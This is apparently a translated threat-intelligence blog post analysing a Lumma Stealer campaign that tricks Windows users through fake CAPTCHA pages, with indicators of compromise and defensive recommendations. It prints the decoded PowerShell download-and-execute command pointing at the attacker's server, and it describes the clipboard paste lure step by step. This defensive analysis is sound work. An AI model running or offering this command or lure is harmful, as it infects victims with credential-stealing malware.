🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
Leia mais
Voltar
Malware Intelligence
Desmascarando o perigo: o malware Lumma Stealer explora páginas CAPTCHA falsas
O malware Lumma Stealer está sendo distribuído por meio de páginas enganosas de verificação humana que induzem os usuários a executar comandos maliciosos do PowerShell. Essa campanha de phishing tem como alvo principal usuários do Windows e pode levar ao roubo de informações confidenciais.
September 19, 2024
5
min
Tabela de conteúdo
Inscreva-se nos recursos do CloudSEK
Receba as últimas notícias, ameaças e recursos do setor.
Categoria: Inteligência adversária
Indústria: Múltiplo
Motivação: Crimes cibernéticos/financeiros
Região: Global
TOPO: VERDE
Sumário executivo
Foi descoberto um método novo e sofisticado de distribuição do malware Lumma Stealer, direcionado aos usuários do Windows por meio de páginas enganosas de verificação humana. Essa técnica, descoberta inicialmente pela Unit42 na Palo Alto Networks, levou a uma investigação mais aprofundada sobre sites maliciosos semelhantes.
Após nossa investigação, identificamos mais sites maliciosos ativos espalhando o Lumma Stealer. É importante observar que, embora essa técnica esteja sendo usada atualmente para distribuir o Lumma Stealer, ela poderia ser usada para fornecer qualquer tipo de malware malicioso a usuários desavisados.
Análise e atribuição
Modus Operandi
Os agentes de ameaças criam sites de phishing hospedados em vários provedores, geralmente utilizando redes de entrega de conteúdo (CDNs). Esses sites apresentam aos usuários uma página falsa do Google CAPTCHA.
- Ao clicar no botão “Verificar”, os usuários recebem instruções incomuns: algum texto
- Abra a caixa de diálogo Executar (Win+R)
- Pressione Ctrl+V
- Pressione Enter
- Sem o conhecimento do usuário, essa ação executa uma função JavaScript oculta que copia um comando do PowerShell codificado em base64 para a área de transferência.
- O comando PowerShell, quando executado, baixa o malware Lumma Stealer de um servidor remoto.
Análise técnica
Nossa equipe de pesquisa identificou vários domínios que hospedam essas páginas de verificação maliciosas. A cadeia de infecção normalmente segue esse padrão:
- O usuário visita a página de verificação falsa
- O script do PowerShell é copiado na área de transferência clicando no botão “Eu não sou um robô”. Depois de inspecionar o código-fonte dos sites de phishing, também é possível revelar o comando que está sendo copiado.
- Depois que o usuário colar o comando do PowerShell na caixa de diálogo Executar, ele executará o PowerShell em uma janela oculta e executará o comando codificado em Base64: powershell -w oculto -eC
- O comando Base64, decodificado iex (iwr http://165.227.121.41/a.txt -useBasicParsing) .Content, buscará o conteúdo do arquivo a.txt hospedado no servidor remoto. Esse conteúdo será então analisado e executado usando Invoke-Expression.
- O arquivo a.txt contém comandos adicionais para baixar o Lumma Stealer no dispositivo da vítima, hospedado em: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip
- Se o arquivo baixado (dengo.zip) for extraído e executado em uma máquina Windows, o Lumma Stealer se tornará operacional e estabelecerá conexões com domínios controlados pelo invasor.
Observações notáveis
- Páginas maliciosas foram encontradas em várias plataformas, incluindo buckets do Amazon S3 e provedores de CDN
- O uso da codificação base64 e da manipulação da área de transferência demonstra os esforços dos atacantes para evitar a detecção
- O executável inicial geralmente baixa componentes adicionais, complicando a análise e potencialmente permitindo a funcionalidade modular
- Embora essa campanha tenha como objetivo principal a distribuição do malware Lumma Stealer, ela tem o potencial de enganar os usuários para que baixem vários tipos de arquivos maliciosos em seus dispositivos Windows.
Recomendações
- Eduque funcionários/usuários sobre essa nova tática de engenharia social, enfatizando o perigo de copiar e colar comandos desconhecidos.
- Implemente e mantenha soluções robustas de proteção de terminais capazes de detectar e bloquear ataques baseados no PowerShell.
- Monitore o tráfego de rede em busca de conexões suspeitas com domínios recém-registrados ou incomuns.
- Atualize e corrija regularmente todos os sistemas para mitigar possíveis vulnerabilidades exploradas pelo malware Lumma Stealer.
URLs falsos maliciosos
- hxxps [://] heroic-genie-2b372e [.] netlify [.] app/please-verify-z [.] html
- hxxps [://] fipydslaongos [.] b-cdn [.] net/please-verify-z [.] html
- hxxps [://] sdkjhfdskjnck [.] s3 [.] amazonaws [.] com/human-verify-system [.] html
- hxxps [://] verifyhuman476 [.] b-cdn [.] net/human-verify-system [.] html
- hxxps [://] pub-9c4ec7f3f95c448b85e464d2b533aac1 [.] r2 [.] dev/human-verify-system [.] html
- hxxps [://] verifyhuman476 [.] b-cdn [.] net/human-verify-system [.] html
- hxxps [://] novas zonas de vídeo [.] click/veri [.] html
- hxxps [://] ch3 [.] dlvideosfre [.] click/human-verify-system [.] html
- hxxps [://] novas zonas de vídeo [.] click/veri [.] html
- hxxps [://] ofsetvideore [.] clique
Tipo | Nome | Valor
Arquivo | dengo.zip | 7c348f51d383d6587e2beac5ff79bef2e66c31d7
IP | IP do servidor de download | 165.227.121.41
Arquivo PE Exec | tr7 | e002696bb7d57315b352844cebc031e18e89f29e
Arquivo PE Exec | 2ndhs.ru | 766c266506918b467bf35db701c9b0954a616b58
Referências
- *Fonte de inteligência e confiabilidade da informação - Wikipedia
- #Protocolo de semáforo - Wikipedia
- https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer
- Unit42-timely-threat-intel/2024-08-28-IOCs-for-Lumman-Stealer-from-fake-human-captcha-copy-paste-script.txt no principal
Apêndice
CloudSEK TRIAD
Inscreva-se nos recursos do CloudSEK
Receba as últimas notícias, ameaças e recursos do setor.
